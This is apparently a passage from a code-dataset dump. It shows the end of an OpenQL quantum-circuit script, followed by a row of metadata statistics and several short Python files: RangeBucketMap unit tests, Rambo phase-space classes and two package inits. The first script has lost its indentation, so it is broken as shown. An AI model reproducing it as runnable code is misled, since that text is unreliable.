k.gate('cnot', (2, 18))
k.gate('t', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (17,))
k.gate('t', (18,))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (2, 17))
k.gate('tdag', (17,))
k.gate('t', (2,))
k.gate('cnot', (2, 17))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (18,))
k.gate('t', (19,))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (3, 18))
k.gate('tdag', (18,))
k.gate('t', (3,))
k.gate('cnot', (3, 18))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (19,))
k.gate('t', (20,))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (4, 19))
k.gate('tdag', (19,))
k.gate('t', (4,))
k.gate('cnot', (4, 19))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (20,))
k.gate('t', (21,))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (5, 20))
k.gate('tdag', (20,))
k.gate('t', (5,))
k.gate('cnot', (5, 20))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (21,))
k.gate('t', (22,))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (6, 21))
k.gate('tdag', (21,))
k.gate('t', (6,))
k.gate('cnot', (6, 21))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (22,))
k.gate('t', (23,))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (7, 22))
k.gate('tdag', (22,))
k.gate('t', (7,))
k.gate('cnot', (7, 22))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (23,))
k.gate('t', (24,))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (8, 23))
k.gate('tdag', (23,))
k.gate('t', (8,))
k.gate('cnot', (8, 23))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (24,))
k.gate('t', (25,))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (9, 24))
k.gate('tdag', (24,))
k.gate('t', (9,))
k.gate('cnot', (9, 24))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (25,))
k.gate('t', (26,))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (10, 25))
k.gate('tdag', (25,))
k.gate('t', (10,))
k.gate('cnot', (10, 25))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (26,))
k.gate('t', (27,))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (11, 26))
k.gate('tdag', (26,))
k.gate('t', (11,))
k.gate('cnot', (11, 26))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (27,))
k.gate('t', (28,))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (12, 27))
k.gate('tdag', (27,))
k.gate('t', (12,))
k.gate('cnot', (12, 27))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (28,))
k.gate('t', (29,))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (13, 28))
k.gate('tdag', (28,))
k.gate('t', (13,))
k.gate('cnot', (13, 28))
k.gate('x', (15,))
k.gate('ym90', (15,))
k.gate('cnot', (14, 15))
k.gate('tdag', (15,))
k.gate('cnot', (29, 15))
k.gate('t', (15,))
k.gate('cnot', (14, 15))
k.gate('tdag', (15,))
k.gate('cnot', (29, 15))
k.gate('t', (14,))
k.gate('t', (15,))
k.gate('x', (15,))
k.gate('ym90', (15,))
k.gate('cnot', (29, 14))
k.gate('tdag', (14,))
k.gate('t', (29,))
k.gate('cnot', (29, 14))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (28,))
k.gate('t', (29,))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (13, 28))
k.gate('tdag', (28,))
k.gate('t', (13,))
k.gate('cnot', (13, 28))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (27,))
k.gate('t', (28,))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (12, 27))
k.gate('tdag', (27,))
k.gate('t', (12,))
k.gate('cnot', (12, 27))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (26,))
k.gate('t', (27,))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (11, 26))
k.gate('tdag', (26,))
k.gate('t', (11,))
k.gate('cnot', (11, 26))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (25,))
k.gate('t', (26,))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (10, 25))
k.gate('tdag', (25,))
k.gate('t', (10,))
k.gate('cnot', (10, 25))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (24,))
k.gate('t', (25,))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (9, 24))
k.gate('tdag', (24,))
k.gate('t', (9,))
k.gate('cnot', (9, 24))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (23,))
k.gate('t', (24,))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (8, 23))
k.gate('tdag', (23,))
k.gate('t', (8,))
k.gate('cnot', (8, 23))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (22,))
k.gate('t', (23,))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (7, 22))
k.gate('tdag', (22,))
k.gate('t', (7,))
k.gate('cnot', (7, 22))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (21,))
k.gate('t', (22,))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (6, 21))
k.gate('tdag', (21,))
k.gate('t', (6,))
k.gate('cnot', (6, 21))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (20,))
k.gate('t', (21,))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (5, 20))
k.gate('tdag', (20,))
k.gate('t', (5,))
k.gate('cnot', (5, 20))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (19,))
k.gate('t', (20,))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (4, 19))
k.gate('tdag', (19,))
k.gate('t', (4,))
k.gate('cnot', (4, 19))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (18,))
k.gate('t', (19,))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (3, 18))
k.gate('tdag', (18,))
k.gate('t', (3,))
k.gate('cnot', (3, 18))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (17,))
k.gate('t', (18,))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (2, 17))
k.gate('tdag', (17,))
k.gate('t', (2,))
k.gate('cnot', (2, 17))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (1,))
k.gate('t', (17,))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (0, 1))
k.gate('tdag', (1,))
k.gate('t', (0,))
k.gate('cnot', (0, 1))
k.gate('x', (15,))
k.gate('ym90', (15,))
k.gate('x', (0,))
k.gate('x', (1,))
k.gate('x', (2,))
k.gate('x', (3,))
k.gate('x', (4,))
k.gate('x', (5,))
k.gate('x', (6,))
k.gate('x', (7,))
k.gate('x', (8,))
k.gate('x', (9,))
k.gate('x', (10,))
k.gate('x', (11,))
k.gate('x', (12,))
k.gate('x', (13,))
k.gate('x', (14,))
k.gate('x', (15,))
k.gate('x', (0,))
k.gate('ym90', (0,))
k.gate('x', (1,))
k.gate('ym90', (1,))
k.gate('x', (2,))
k.gate('ym90', (2,))
k.gate('x', (3,))
k.gate('ym90', (3,))
k.gate('x', (4,))
k.gate('ym90', (4,))
k.gate('x', (5,))
k.gate('ym90', (5,))
k.gate('x', (6,))
k.gate('ym90', (6,))
k.gate('x', (7,))
k.gate('ym90', (7,))
k.gate('x', (8,))
k.gate('ym90', (8,))
k.gate('x', (9,))
k.gate('ym90', (9,))
k.gate('x', (10,))
k.gate('ym90', (10,))
k.gate('x', (11,))
k.gate('ym90', (11,))
k.gate('x', (12,))
k.gate('ym90', (12,))
k.gate('x', (13,))
k.gate('ym90', (13,))
k.gate('x', (14,))
k.gate('ym90', (14,))
k.gate('x', (15,))
k.gate('ym90', (15,))
if measurement:
for q in range(num_qubits):
k.gate('measure', [q])
p.add_kernel(k)
p.compile()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='OpenQL compilation of a Quantum Algorithm')
parser.add_argument('--new_scheduler', nargs='?', default='yes', help='Scheduler defined by Hans')
parser.add_argument('--scheduler', nargs='?', default='ASAP', help='Scheduler specification (ASAP (default), ALAP, ...)')
parser.add_argument('--uniform_sched', nargs='?', default='no', help='Uniform shceduler actication (yes or no)')
parser.add_argument('--sched_commute', nargs='?', default='yes', help='Permits two-qubit gates to be commutable')
parser.add_argument('--mapper', nargs='?', default='minextend', help='Mapper specification (base, minextend, minextendrc)')
parser.add_argument('--moves', nargs='?', default='no', help='Let the use of moves')
parser.add_argument('--maptiebreak', nargs='?', default='random', help='')
parser.add_argument('--initial_placement', nargs='?', default='no', help='Initial placement specification (yes or no)')
parser.add_argument('--out_dir', nargs='?', default='compiler_output', help='Folder name to store the compilation')
parser.add_argument('--measurement', nargs='?', default=True, help='Add measurement to all the qubits in the end of the algorithm')
args = parser.parse_args()
try:
circuit(args.new_scheduler, args.scheduler, args.uniform_sched, args.sched_commute, args.mapper, args.moves, args.maptiebreak, args.initial_placement, args.out_dir)
except TypeError:
print('\nCompiled, but some gate is not defined in the configuration file. \nThe gate will be invoked like it is.')
raise
| 26.59589
| 244
| 0.423481
| 5,161
| 31,064
| 2.534974
| 0.031002
| 0.428036
| 0.23114
| 0.017657
| 0.872736
| 0.872736
| 0.867309
| 0.857831
| 0.857831
| 0.857831
| 0
| 0.124577
| 0.239506
| 31,064
| 1,168
| 245
| 26.59589
| 0.429225
| 0
| 0
| 0.964625
| 0
| 0.000863
| 0.129539
| 0.000934
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000863
| false
| 0
| 0.002588
| 0
| 0.003451
| 0.000863
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b9b8e73e3fdd8876fddb0ad5b400960b334a7592
| 128
|
py
|
Python
|
adasher/data_utils/__init__.py
|
Bhanuchander210/adasher
|
f1902ce23b7ec461d47da81eee68e7e67c1e4ab5
|
[
"MIT"
] | 1
|
2022-03-16T23:35:42.000Z
|
2022-03-16T23:35:42.000Z
|
adasher/data_utils/__init__.py
|
Bhanuchander210/adasher
|
f1902ce23b7ec461d47da81eee68e7e67c1e4ab5
|
[
"MIT"
] | null | null | null |
adasher/data_utils/__init__.py
|
Bhanuchander210/adasher
|
f1902ce23b7ec461d47da81eee68e7e67c1e4ab5
|
[
"MIT"
] | null | null | null |
from adasher.data_utils.__util import DF, Period, Periods
def time_period(dt1, dt2, name):
return Period(dt1, dt2, name)
| 18.285714
| 57
| 0.734375
| 20
| 128
| 4.5
| 0.75
| 0.2
| 0.266667
| 0.355556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037383
| 0.164063
| 128
| 6
| 58
| 21.333333
| 0.803738
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
b9d25657407c98c719c723e18792b38b090227a2
| 1,519
|
py
|
Python
|
src/hepmc/core/densities/rambo.py
|
mathisgerdes/monte-carlo-integration
|
533d13eeb538fec46f8d5ed00e780153b68ba7d9
|
[
"MIT"
] | 2
|
2018-11-15T03:01:03.000Z
|
2020-02-25T16:54:02.000Z
|
src/hepmc/core/densities/rambo.py
|
mathisgerdes/monte-carlo-integration
|
533d13eeb538fec46f8d5ed00e780153b68ba7d9
|
[
"MIT"
] | null | null | null |
src/hepmc/core/densities/rambo.py
|
mathisgerdes/monte-carlo-integration
|
533d13eeb538fec46f8d5ed00e780153b68ba7d9
|
[
"MIT"
] | 1
|
2021-04-15T09:02:00.000Z
|
2021-04-15T09:02:00.000Z
|
import numpy as np
from ..density import Distribution
from .. import phase_space
class Rambo(Distribution):
def __init__(self, nparticles, E_CM):
self.mapping = phase_space.Rambo(E_CM, nparticles)
super().__init__(self.mapping.ndim, False)
def rvs(self, sample_size):
xs = np.random.random((sample_size, self.ndim))
return self.mapping.map(xs)
def pdf(self, xs):
return self.mapping.pdf(xs)
@property
def e_cm(self):
return self.mapping.e_cm
@e_cm.setter
def e_cm(self, value):
self.mapping.e_cm = value
@property
def nparticles(self):
return self.mapping.nparticles
@nparticles.setter
def nparticles(self, value):
self.mapping = phase_space.Rambo(self.e_cm, value)
class RamboOnDiet(Distribution):
def __init__(self, nparticles, E_CM):
self.mapping = phase_space.RamboOnDiet(E_CM, nparticles)
super().__init__(self.mapping.ndim, False)
def rvs(self, sample_size):
xs = np.random.random((sample_size, self.ndim))
return self.mapping.map(xs)
def pdf(self, xs):
return self.mapping.pdf(xs)
@property
def e_cm(self):
return self.mapping.e_cm
@e_cm.setter
def e_cm(self, value):
self.mapping.e_cm = value
@property
def nparticles(self):
return self.mapping.nparticles
@nparticles.setter
def nparticles(self, value):
self.mapping = phase_space.RamboOnDiet(self.e_cm, value)
| 23.734375
| 64
| 0.651086
| 204
| 1,519
| 4.647059
| 0.161765
| 0.050633
| 0.14346
| 0.088608
| 0.879747
| 0.845992
| 0.845992
| 0.845992
| 0.845992
| 0.845992
| 0
| 0
| 0.239631
| 1,519
| 63
| 65
| 24.111111
| 0.820779
| 0
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.311111
| false
| 0
| 0.066667
| 0.133333
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
b9f60a1f44261659f1049a1cd4f5d01188546b41
| 5,558
|
py
|
Python
|
Ranger/test/src/Collections/RangeBucketMapTest.py
|
er432/Ranger
|
a583b332ffe0e5db9f60a5716c9a5504d91fbd39
|
[
"BSD-3-Clause"
] | 2
|
2015-03-22T00:31:28.000Z
|
2021-01-31T16:24:42.000Z
|
Ranger/test/src/Collections/RangeBucketMapTest.py
|
er432/Ranger
|
a583b332ffe0e5db9f60a5716c9a5504d91fbd39
|
[
"BSD-3-Clause"
] | 1
|
2015-10-06T00:43:51.000Z
|
2015-10-06T02:36:36.000Z
|
Ranger/test/src/Collections/RangeBucketMapTest.py
|
er432/Ranger
|
a583b332ffe0e5db9f60a5716c9a5504d91fbd39
|
[
"BSD-3-Clause"
] | 2
|
2016-04-10T08:02:23.000Z
|
2020-12-11T06:17:41.000Z
|
import unittest
from Ranger.src.Collections.RangeBucketMap import RangeBucketMap
from Ranger.src.Range.Range import Range
debug = False
class RangeBucketMapTest(unittest.TestCase):
""" Unit Tests for RangeBucketMap.py """
def test_put(self):
if debug: print("Testing put")
buckets = RangeBucketMap()
buckets.put(Range.closed(3,5),'a')
self.assertEqual(buckets.ranges[0], Range.closed(3,5))
self.assertEquals(buckets.items[0], set(['a']))
buckets.put(Range.closed(7,10), 'b')
self.assertEqual(len(buckets),2)
self.assertEqual(buckets.ranges[0], Range.closed(3,5))
self.assertEqual(buckets.ranges[1], Range.closed(7,10))
self.assertEqual(buckets.items[0], set(['a']))
self.assertEqual(buckets.items[1], set(['b']))
buckets.put(Range.closed(4,8),'c')
self.assertEqual(len(buckets),5)
self.assertEqual(buckets.ranges[0], Range.closedOpen(3,4))
self.assertEqual(buckets.ranges[1], Range.closed(4,5))
self.assertEqual(buckets.ranges[2], Range.open(5,7))
self.assertEqual(buckets.ranges[3], Range.closed(7,8))
self.assertEqual(buckets.ranges[4], Range.openClosed(8,10))
self.assertEqual(buckets.items[0], set(['a']))
self.assertEqual(buckets.items[1], set(['a','c']))
self.assertEqual(buckets.items[2], set(['c']))
self.assertEqual(buckets.items[3], set(['b','c']))
self.assertEqual(buckets.items[4], set(['b']))
def test_get(self):
if debug: print("Testing get")
buckets = RangeBucketMap()
buckets.put(Range.closed(3,5),'a')
buckets.put(Range.closed(7,10),'b')
buckets.put(Range.closed(4,8),'c')
self.assertEqual(buckets.get(6),set(['c']))
self.assertEqual(buckets.get(4),set(['a','c']))
self.assertEquals(buckets.get(Range.closed(0,20)),set(['a','b','c']))
self.assertEquals(buckets.get(Range.openClosed(5,8)),set(['b','c']))
def test_get_bugfix1(self):
if debug: print("Testing get under first bugfix")
buckets = RangeBucketMap()
buckets.put(Range.closed(67432367,67434244),'G')
buckets.put(Range.closed(67432367,67434244),'T1')
buckets.put(Range.closed(67432375,67434015),'T2')
buckets_dict = dict((v,k) for k,v in buckets.iteritems())
self.assertEqual(buckets_dict['T2'], Range.closed(67432375,67434015))
def test_remove(self):
if debug: print("Testing remove")
buckets = RangeBucketMap()
buckets.put(Range.closed(3,5),'a')
buckets.put(Range.closed(7,10),'b')
buckets.put(Range.closed(4,8),'c')
buckets.remove(Range.closed(3,3))
self.assertEqual(len(buckets),5)
self.assertEqual(buckets.ranges[0], Range.open(3,4))
self.assertEqual(buckets.ranges[1], Range.closed(4,5))
self.assertEqual(buckets.ranges[2], Range.open(5,7))
self.assertEqual(buckets.ranges[3], Range.closed(7,8))
self.assertEqual(buckets.ranges[4], Range.openClosed(8,10))
self.assertEqual(buckets.items[0], set(['a']))
self.assertEqual(buckets.items[1], set(['a','c']))
self.assertEqual(buckets.items[2], set(['c']))
self.assertEqual(buckets.items[3], set(['b','c']))
self.assertEqual(buckets.items[4], set(['b']))
buckets.remove(Range.closed(9,20))
self.assertEqual(len(buckets),5)
self.assertEqual(buckets.ranges[0], Range.open(3,4))
self.assertEqual(buckets.ranges[1], Range.closed(4,5))
self.assertEqual(buckets.ranges[2], Range.open(5,7))
self.assertEqual(buckets.ranges[3], Range.closed(7,8))
self.assertEqual(buckets.ranges[4], Range.open(8,9))
self.assertEqual(buckets.items[0], set(['a']))
self.assertEqual(buckets.items[1], set(['a','c']))
self.assertEqual(buckets.items[2], set(['c']))
self.assertEqual(buckets.items[3], set(['b','c']))
self.assertEqual(buckets.items[4], set(['b']))
buckets.remove(Range.closed(5,7))
self.assertEqual(len(buckets),4)
self.assertEqual(buckets.ranges[0], Range.open(3,4))
self.assertEqual(buckets.ranges[1], Range.closedOpen(4,5))
self.assertEqual(buckets.ranges[2], Range.openClosed(7,8))
self.assertEqual(buckets.ranges[3], Range.open(8,9))
self.assertEqual(buckets.items[0], set(['a']))
self.assertEqual(buckets.items[1], set(['a','c']))
self.assertEqual(buckets.items[2], set(['b','c']))
self.assertEqual(buckets.items[3], set(['b']))
def test_iteritems(self):
if debug: print("Testing iteritems")
buckets = RangeBucketMap()
buckets.put(Range.closed(3,5),'a')
buckets.put(Range.closed(7,10),'b')
buckets.put(Range.closed(4,8),'c')
iterator = buckets.iteritems(2,10)
self.assertEquals(next(iterator), (Range.closed(3,5), 'a'))
self.assertEquals(next(iterator), (Range.closed(4,8), 'c'))
self.assertEquals(next(iterator), (Range.closed(7,10), 'b'))
with self.assertRaises(StopIteration):
next(iterator)
iterator = buckets.iteritems(3,8)
self.assertEquals(next(iterator), (Range.closed(3,5), 'a'))
self.assertEquals(next(iterator), (Range.closed(4,8), 'c'))
self.assertEquals(next(iterator), (Range.closed(7,8), 'b'))
with self.assertRaises(StopIteration):
next(iterator)
if __name__ == "__main__":
debug = True
unittest.main(exit = False)
| 49.625
| 77
| 0.624685
| 737
| 5,558
| 4.689281
| 0.104478
| 0.221354
| 0.292824
| 0.178241
| 0.804398
| 0.76765
| 0.697627
| 0.660301
| 0.632813
| 0.619792
| 0
| 0.049623
| 0.187837
| 5,558
| 111
| 78
| 50.072072
| 0.715995
| 0.005757
| 0
| 0.574074
| 0
| 0
| 0.027909
| 0
| 0
| 0
| 0
| 0
| 0.574074
| 1
| 0.046296
| false
| 0
| 0.027778
| 0
| 0.083333
| 0.046296
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9ff1a2cb9aa9de7941c92a74be607ff50750766
| 204
|
py
|
Python
|
src/audit_alembic/__init__.py
|
jpassaro/Audit-Alembic
|
3f0d83cd9965933ee6779ca335fd0945aa853969
|
[
"MIT"
] | 2
|
2017-07-10T19:15:04.000Z
|
2021-07-07T14:27:39.000Z
|
src/audit_alembic/__init__.py
|
jpassaro/Audit-Alembic
|
3f0d83cd9965933ee6779ca335fd0945aa853969
|
[
"MIT"
] | 7
|
2017-07-10T17:16:37.000Z
|
2017-12-12T02:06:18.000Z
|
src/audit_alembic/__init__.py
|
jpassaro/Audit-Alembic
|
3f0d83cd9965933ee6779ca335fd0945aa853969
|
[
"MIT"
] | 3
|
2017-12-12T02:04:16.000Z
|
2018-03-14T02:17:04.000Z
|
__version__ = "0.2.0"
from . import exc # noqa: F401
from .base import Auditor # noqa: F401
from .base import CommonColumnValues # noqa: F401
from .base import alembic_supports_callback # noqa: F401
| 29.142857
| 57
| 0.740196
| 29
| 204
| 5
| 0.482759
| 0.22069
| 0.248276
| 0.331034
| 0.455172
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089286
| 0.176471
| 204
| 6
| 58
| 34
| 0.77381
| 0.210784
| 0
| 0
| 0
| 0
| 0.032051
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e04d783221856972c4b63e71a76928532e617ca2
| 102
|
py
|
Python
|
cloeepy_mongo/__init__.py
|
cloeeai/CloeePy-Mongo
|
4fa7cde79e8f62bf089985c595e4c9e8806b1166
|
[
"MIT"
] | null | null | null |
cloeepy_mongo/__init__.py
|
cloeeai/CloeePy-Mongo
|
4fa7cde79e8f62bf089985c595e4c9e8806b1166
|
[
"MIT"
] | null | null | null |
cloeepy_mongo/__init__.py
|
cloeeai/CloeePy-Mongo
|
4fa7cde79e8f62bf089985c595e4c9e8806b1166
|
[
"MIT"
] | null | null | null |
from cloeepy_mongo.cloeepy_mongo import CloeePyMongo
def get_plugin_class():
return CloeePyMongo
| 20.4
| 52
| 0.833333
| 13
| 102
| 6.230769
| 0.769231
| 0.296296
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127451
| 102
| 4
| 53
| 25.5
| 0.910112
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
e04f2bea1cb0d44b0ce2b413f21e9debf566f4e0
| 10,433
|
py
|
Python
|
ByteToImage/src/bytetoimage.py
|
p--q/ByteToImage
|
79139718ecbb499a72340155ff5be3b9ffce5c5b
|
[
"BSD-3-Clause"
] | null | null | null |
ByteToImage/src/bytetoimage.py
|
p--q/ByteToImage
|
79139718ecbb499a72340155ff5be3b9ffce5c5b
|
[
